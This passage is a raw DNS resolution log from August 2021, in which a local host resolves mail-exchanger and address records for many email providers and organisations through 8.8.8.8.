Aug 24, 2021 08:48:02.276725054 CEST	8.8.8.8	192.168.2.7	0x4928	No error (0)	msn-com.olc.protection.outlook.com		104.47.57.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.368632078 CEST	8.8.8.8	192.168.2.7	0x4127	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.368632078 CEST	8.8.8.8	192.168.2.7	0x4127	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.368632078 CEST	8.8.8.8	192.168.2.7	0x4127	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.368632078 CEST	8.8.8.8	192.168.2.7	0x4127	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.368632078 CEST	8.8.8.8	192.168.2.7	0x4127	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.368632078 CEST	8.8.8.8	192.168.2.7	0x4127	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.368632078 CEST	8.8.8.8	192.168.2.7	0x4127	No error (0)	mta6.am0.yahoodns.net		98.136.96.75	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.368632078 CEST	8.8.8.8	192.168.2.7	0x4127	No error (0)	mta6.am0.yahoodns.net		67.195.204.72	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.513859987 CEST	8.8.8.8	192.168.2.7	0x558e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.513859987 CEST	8.8.8.8	192.168.2.7	0x558e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.841063023 CEST	8.8.8.8	192.168.2.7	0xd8be	No error (0)	www.instagram.com	default-geo-p42.instagram.com		CNAME (Canonical name)	IN (0x0001)
Aug 24, 2021 08:48:02.841063023 CEST	8.8.8.8	192.168.2.7	0xd8be	No error (0)	default-geo-p42.instagram.com	z-p42-instagram.c10r.instagram.com		CNAME (Canonical name)	IN (0x0001)
Aug 24, 2021 08:48:02.841063023 CEST	8.8.8.8	192.168.2.7	0xd8be	No error (0)	z-p42-instagram.c10r.instagram.com		157.240.17.174	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.933784962 CEST	8.8.8.8	192.168.2.7	0x7bc6	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.933784962 CEST	8.8.8.8	192.168.2.7	0x7bc6	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.041789055 CEST	8.8.8.8	192.168.2.7	0xc4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.041789055 CEST	8.8.8.8	192.168.2.7	0xc4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.047930956 CEST	8.8.8.8	192.168.2.7	0xc8d4	No error (0)	eur.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.047930956 CEST	8.8.8.8	192.168.2.7	0xc8d4	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.132731915 CEST	8.8.8.8	192.168.2.7	0xd9a1	No error (0)	aol.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:03.193417072 CEST	8.8.8.8	192.168.2.7	0x1030	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.80	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.193417072 CEST	8.8.8.8	192.168.2.7	0x1030	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.75	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.193417072 CEST	8.8.8.8	192.168.2.7	0x1030	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.92	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.193417072 CEST	8.8.8.8	192.168.2.7	0x1030	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.84	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.193417072 CEST	8.8.8.8	192.168.2.7	0x1030	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.93	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.193417072 CEST	8.8.8.8	192.168.2.7	0x1030	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.86	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.278707981 CEST	8.8.8.8	192.168.2.7	0xb88d	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.278707981 CEST	8.8.8.8	192.168.2.7	0xb88d	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.313237906 CEST	8.8.8.8	192.168.2.7	0x634	No error (0)	free.fr			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:03.313237906 CEST	8.8.8.8	192.168.2.7	0x634	No error (0)	free.fr			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:03.416866064 CEST	8.8.8.8	192.168.2.7	0x90de	No error (0)	mx1.free.fr		212.27.48.7	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.416866064 CEST	8.8.8.8	192.168.2.7	0x90de	No error (0)	mx1.free.fr		212.27.48.6	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.423311949 CEST	8.8.8.8	192.168.2.7	0x11ce	No error (0)	eur.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.423311949 CEST	8.8.8.8	192.168.2.7	0x11ce	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.495615959 CEST	8.8.8.8	192.168.2.7	0x6aad	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.495615959 CEST	8.8.8.8	192.168.2.7	0x6aad	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.545350075 CEST	8.8.8.8	192.168.2.7	0x39a9	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.545350075 CEST	8.8.8.8	192.168.2.7	0x39a9	No error (0)	eur.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.775655031 CEST	8.8.8.8	192.168.2.7	0x5fd7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.775655031 CEST	8.8.8.8	192.168.2.7	0x5fd7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.891371965 CEST	8.8.8.8	192.168.2.7	0x701c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:03.891371965 CEST	8.8.8.8	192.168.2.7	0x701c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:04.023221016 CEST	8.8.8.8	192.168.2.7	0x52f5	No error (0)	live-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:04.023221016 CEST	8.8.8.8	192.168.2.7	0x52f5	No error (0)	live-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:04.024137974 CEST	8.8.8.8	192.168.2.7	0x456c	No error (0)	outlook.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:04.026463032 CEST	8.8.8.8	192.168.2.7	0x67d6	No error (0)	eur.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:04.026463032 CEST	8.8.8.8	192.168.2.7	0x67d6	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:04.081742048 CEST	8.8.8.8	192.168.2.7	0x3469	No error (0)	outlook-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:04.081742048 CEST	8.8.8.8	192.168.2.7	0x3469	No error (0)	outlook-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:04.179713964 CEST	8.8.8.8	192.168.2.7	0x95b4	No error (0)	slu.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:04.179713964 CEST	8.8.8.8	192.168.2.7	0x95b4	No error (0)	slu.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:04.273912907 CEST	8.8.8.8	192.168.2.7	0x1efc	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:04.352272034 CEST	8.8.8.8	192.168.2.7	0x3f8a	No error (0)	live-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:04.352272034 CEST	8.8.8.8	192.168.2.7	0x3f8a	No error (0)	live-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:04.369647980 CEST	8.8.8.8	192.168.2.7	0xa42c	No error (0)	mxa-00234e01.gslb.pphosted.com		148.163.158.101	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:04.400027990 CEST	8.8.8.8	192.168.2.7	0xd8a0	No error (0)	zdf.de			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:04.452429056 CEST	8.8.8.8	192.168.2.7	0x73c9	No error (0)	inmail.zdf.de		194.45.94.190	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:04.898041964 CEST	8.8.8.8	192.168.2.7	0xdf8c	No error (0)	mxa-00234e01.gslb.pphosted.com		148.163.156.131	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:04.915399075 CEST	8.8.8.8	192.168.2.7	0xc06	No error (0)	trivett.com.au			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:04.915399075 CEST	8.8.8.8	192.168.2.7	0xc06	No error (0)	trivett.com.au			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:05.025302887 CEST	8.8.8.8	192.168.2.7	0xa4a7	No error (0)	mx08-00031601.pphosted.com		185.132.182.217	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:05.067106962 CEST	8.8.8.8	192.168.2.7	0x50d7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:05.067106962 CEST	8.8.8.8	192.168.2.7	0x50d7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:05.309118032 CEST	8.8.8.8	192.168.2.7	0x178a	No error (0)	msn-com.olc.protection.outlook.com		104.47.56.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:05.309118032 CEST	8.8.8.8	192.168.2.7	0x178a	No error (0)	msn-com.olc.protection.outlook.com		104.47.57.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:05.311950922 CEST	8.8.8.8	192.168.2.7	0xa75a	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:05.311950922 CEST	8.8.8.8	192.168.2.7	0xa75a	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:05.373893976 CEST	8.8.8.8	192.168.2.7	0x5ec0	No error (0)	sun.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:05.373893976 CEST	8.8.8.8	192.168.2.7	0x5ec0	No error (0)	sun.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:05.418140888 CEST	8.8.8.8	192.168.2.7	0x1373	No error (0)	mxa-00069f01.gslb.pphosted.com		205.220.165.26	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:05.446487904 CEST	8.8.8.8	192.168.2.7	0xf654	No error (0)	77.52.17.84.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 24, 2021 08:48:05.542146921 CEST	8.8.8.8	192.168.2.7	0x2c91	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:05.542146921 CEST	8.8.8.8	192.168.2.7	0x2c91	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:05.753479958 CEST	8.8.8.8	192.168.2.7	0x1beb	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:05.753479958 CEST	8.8.8.8	192.168.2.7	0x1beb	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:05.886862993 CEST	8.8.8.8	192.168.2.7	0xdc4b	No error (0)	aspentech.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:05.886862993 CEST	8.8.8.8	192.168.2.7	0xdc4b	No error (0)	aspentech.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:06.091304064 CEST	8.8.8.8	192.168.2.7	0x4095	No error (0)	mxb-0023c001.gslb.pphosted.com		148.163.149.1	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:06.157926083 CEST	8.8.8.8	192.168.2.7	0xcb8c	No error (0)	selinc.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:06.157926083 CEST	8.8.8.8	192.168.2.7	0xcb8c	No error (0)	selinc.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:06.234642029 CEST	8.8.8.8	192.168.2.7	0x2c28	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:06.234642029 CEST	8.8.8.8	192.168.2.7	0x2c28	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:06.308485985 CEST	8.8.8.8	192.168.2.7	0x5bbe	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:06.308485985 CEST	8.8.8.8	192.168.2.7	0x5bbe	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:06.397270918 CEST	8.8.8.8	192.168.2.7	0xcecd	No error (0)	mxa-000e8d01.gslb.pphosted.com		148.163.147.191	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:06.433669090 CEST	8.8.8.8	192.168.2.7	0xa962	No error (0)	msn-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:06.433669090 CEST	8.8.8.8	192.168.2.7	0xa962	No error (0)	msn-com.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:06.630636930 CEST	8.8.8.8	192.168.2.7	0x4ad4	No error (0)	crbard.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:06.630636930 CEST	8.8.8.8	192.168.2.7	0x4ad4	No error (0)	crbard.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:06.630636930 CEST	8.8.8.8	192.168.2.7	0x4ad4	No error (0)	crbard.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:06.630636930 CEST	8.8.8.8	192.168.2.7	0x4ad4	No error (0)	crbard.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:06.815541029 CEST	8.8.8.8	192.168.2.7	0xca38	No error (0)	smtpmail6.crbard.com		206.19.235.149	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:06.826025963 CEST	8.8.8.8	192.168.2.7	0x7676	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:06.826025963 CEST	8.8.8.8	192.168.2.7	0x7676	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:06.881364107 CEST	8.8.8.8	192.168.2.7	0xe4f9	No error (0)	ametek.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:06.881364107 CEST	8.8.8.8	192.168.2.7	0xe4f9	No error (0)	ametek.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:06.972543955 CEST	8.8.8.8	192.168.2.7	0xe38f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:06.972543955 CEST	8.8.8.8	192.168.2.7	0xe38f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:07.091917038 CEST	8.8.8.8	192.168.2.7	0x9ad2	No error (0)	mxa-001ec801.gslb.pphosted.com		148.163.140.146	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:07.225282907 CEST	8.8.8.8	192.168.2.7	0x66e3	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:07.225282907 CEST	8.8.8.8	192.168.2.7	0x66e3	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:07.314491034 CEST	8.8.8.8	192.168.2.7	0x739c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:07.314491034 CEST	8.8.8.8	192.168.2.7	0x739c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:07.407001019 CEST	8.8.8.8	192.168.2.7	0x48a5	No error (0)	msn-com.olc.protection.outlook.com		104.47.56.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:07.407001019 CEST	8.8.8.8	192.168.2.7	0x48a5	No error (0)	msn-com.olc.protection.outlook.com		104.47.57.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:07.575251102 CEST	8.8.8.8	192.168.2.7	0x8ba5	No error (0)	edwardjones.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:07.575251102 CEST	8.8.8.8	192.168.2.7	0x8ba5	No error (0)	edwardjones.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:07.575251102 CEST	8.8.8.8	192.168.2.7	0x8ba5	No error (0)	edwardjones.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:07.575251102 CEST	8.8.8.8	192.168.2.7	0x8ba5	No error (0)	edwardjones.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:07.575251102 CEST	8.8.8.8	192.168.2.7	0x8ba5	No error (0)	edwardjones.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:07.575251102 CEST	8.8.8.8	192.168.2.7	0x8ba5	No error (0)	edwardjones.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:07.656285048 CEST	8.8.8.8	192.168.2.7	0x2fea	No error (0)	napasmss-1.edwardjones.com		167.80.136.76	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:07.658495903 CEST	8.8.8.8	192.168.2.7	0x6ed	No error (0)	live-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:07.658495903 CEST	8.8.8.8	192.168.2.7	0x6ed	No error (0)	live-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:07.919905901 CEST	8.8.8.8	192.168.2.7	0x79e9	No error (0)	mxa-001ec801.gslb.pphosted.com		148.163.140.146	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.107785940 CEST	8.8.8.8	192.168.2.7	0x226a	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.107785940 CEST	8.8.8.8	192.168.2.7	0x226a	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.231729031 CEST	8.8.8.8	192.168.2.7	0x5de	No error (0)	cb-sisco.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:08.231729031 CEST	8.8.8.8	192.168.2.7	0x5de	No error (0)	cb-sisco.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:08.323287010 CEST	8.8.8.8	192.168.2.7	0xc3a7	No error (0)	eur.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.323287010 CEST	8.8.8.8	192.168.2.7	0xc3a7	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.447251081 CEST	8.8.8.8	192.168.2.7	0xd2fc	No error (0)	mxa-002c2d01.gslb.pphosted.com		148.163.151.61	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.478923082 CEST	8.8.8.8	192.168.2.7	0xe5b9	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.478923082 CEST	8.8.8.8	192.168.2.7	0xe5b9	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.654006958 CEST	8.8.8.8	192.168.2.7	0x29b7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.654006958 CEST	8.8.8.8	192.168.2.7	0x29b7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.681607008 CEST	8.8.8.8	192.168.2.7	0x6231	No error (0)	live-com.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.681607008 CEST	8.8.8.8	192.168.2.7	0x6231	No error (0)	live-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.929825068 CEST	8.8.8.8	192.168.2.7	0x2a46	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.929825068 CEST	8.8.8.8	192.168.2.7	0x2a46	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:08.964405060 CEST	8.8.8.8	192.168.2.7	0xdb98	No error (0)	ni.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:08.964405060 CEST	8.8.8.8	192.168.2.7	0xdb98	No error (0)	ni.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:09.058667898 CEST	8.8.8.8	192.168.2.7	0xe0c4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:09.058667898 CEST	8.8.8.8	192.168.2.7	0xe0c4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:09.162795067 CEST	8.8.8.8	192.168.2.7	0x38a4	No error (0)	mxb-00010702.gslb.pphosted.com		148.163.158.57	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:09.786823988 CEST	8.8.8.8	192.168.2.7	0x4763	No error (0)	tps.org			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:09.786823988 CEST	8.8.8.8	192.168.2.7	0x4763	No error (0)	tps.org			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:09.900641918 CEST	8.8.8.8	192.168.2.7	0x1964	No error (0)	kennametal.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:09.900641918 CEST	8.8.8.8	192.168.2.7	0x1964	No error (0)	kennametal.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:09.900947094 CEST	8.8.8.8	192.168.2.7	0xd971	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:09.900947094 CEST	8.8.8.8	192.168.2.7	0xd971	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:09.951761007 CEST	8.8.8.8	192.168.2.7	0x582f	No error (0)	mxa-0063c401.gslb.pphosted.com		205.220.165.73	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:10.091897011 CEST	8.8.8.8	192.168.2.7	0xb382	No error (0)	mxb-002a1b02.gslb.pphosted.com		148.163.144.5	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:10.148432016 CEST	8.8.8.8	192.168.2.7	0x96cf	No error (0)	m.youtube.com		216.58.215.238	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:10.192049026 CEST	8.8.8.8	192.168.2.7	0xbf23	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:10.192049026 CEST	8.8.8.8	192.168.2.7	0xbf23	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:10.422494888 CEST	8.8.8.8	192.168.2.7	0xd1a8	No error (0)	unk.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:10.422494888 CEST	8.8.8.8	192.168.2.7	0xd1a8	No error (0)	unk.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:10.512320995 CEST	8.8.8.8	192.168.2.7	0x9599	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:10.512320995 CEST	8.8.8.8	192.168.2.7	0x9599	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:10.633225918 CEST	8.8.8.8	192.168.2.7	0xb8f5	No error (0)	mxa-00246402.gslb.pphosted.com		148.163.147.197	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:10.674869061 CEST	8.8.8.8	192.168.2.7	0x10b5	No error (0)	mfgservs.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:10.674869061 CEST	8.8.8.8	192.168.2.7	0x10b5	No error (0)	mfgservs.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:10.674869061 CEST	8.8.8.8	192.168.2.7	0x10b5	No error (0)	mfgservs.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:10.674869061 CEST	8.8.8.8	192.168.2.7	0x10b5	No error (0)	mfgservs.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:10.674869061 CEST	8.8.8.8	192.168.2.7	0x10b5	No error (0)	mfgservs.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:10.785125017 CEST	8.8.8.8	192.168.2.7	0xce52	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:10.785125017 CEST	8.8.8.8	192.168.2.7	0xce52	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:10.799098015 CEST	8.8.8.8	192.168.2.7	0xbf72	No error (0)	aspmx.l.google.com		173.194.69.26	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:11.069756031 CEST	8.8.8.8	192.168.2.7	0x7b4c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:11.069756031 CEST	8.8.8.8	192.168.2.7	0x7b4c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:11.188585997 CEST	8.8.8.8	192.168.2.7	0x6a3c	No error (0)	spectrum-health.org			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.188585997 CEST	8.8.8.8	192.168.2.7	0x6a3c	No error (0)	spectrum-health.org			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.379101038 CEST	8.8.8.8	192.168.2.7	0x74a7	No error (0)	mxa-001e1201.gslb.pphosted.com		67.231.144.223	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:11.608654022 CEST	8.8.8.8	192.168.2.7	0x6980	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:11.608654022 CEST	8.8.8.8	192.168.2.7	0x6980	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
